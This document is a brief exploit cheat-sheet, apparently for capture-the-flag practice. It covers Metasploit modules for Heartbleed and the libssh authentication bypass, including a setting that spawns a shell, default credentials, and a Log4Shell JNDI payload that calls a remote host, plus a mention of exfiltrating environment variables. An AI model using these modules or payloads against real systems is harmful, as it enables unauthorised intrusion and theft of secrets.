Common Exploits

• Heartbleed

  Metasploit module: auxiliary/scanner/ssl/openssl_heartbleed

  Be sure to use set VERBOSE true to see the retrieved results. This can often contain a flag or some valuable information.

• libssh - SSH

  libssh0.8.1 (or others??) is vulnerable to an easy and immediate login. Metasploit module: auxiliary/scanner/ssh/libssh_auth_bypass. Be sure to set spawn_pty true to actually receive a shell! Then sessions -i 1 to interact with the shell spawned (or whatever appropriate ID)

• Default credentials - CheatSheet

  Unconfigured system can use the default credentials to login.

• Log4Shell

  Exploit on the Java library Log4j. Malicious code is fetched and executed from a remote JNDI server. A payload looks like ${jndi:ldap://example.com:1389/a} and need to be parsed by Log4j.

  • Simple POC

  • JNDI Exploit Kit

  • ECW2022 author’s WU

  • Request Bin Useful for detection and environment variable exfiltration.